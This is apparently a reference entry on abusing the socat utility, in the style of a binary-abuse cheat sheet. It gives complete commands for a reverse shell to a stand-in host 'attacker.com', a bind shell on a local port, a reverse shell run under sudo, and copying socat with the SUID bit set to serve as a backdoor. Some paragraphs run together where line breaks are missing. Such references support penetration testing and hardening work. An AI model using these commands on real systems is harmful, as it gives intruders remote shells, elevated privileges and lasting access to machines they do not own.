It can send back a reverse shell to a listening attacker to open a remote network access.
Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.
RHOST=attacker.com
RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,saneIt can bind a shell to a local port to allow remote network access.
Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 on the attacker box to connect to the shell.
LPORT=12345
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,saneIt runs in privileged context and may be used to access the file system,
escalate or maintain access with elevated privileges if enabled on sudo.
Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.
RHOST=attacker.com
RPORT=12345
sudo -E socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,saneIt runs with the SUID bit set and may be exploited to access the file
system, escalate or maintain access with elevated privileges working as a
SUID backdoor. If it is used to run commands it only works on systems
like Debian that allow the default sh shell to run with SUID privileges.
Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.
sudo sh -c 'cp $(which socat) .; chmod +s ./socat'
RHOST=attacker.com
RPORT=12345
./socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane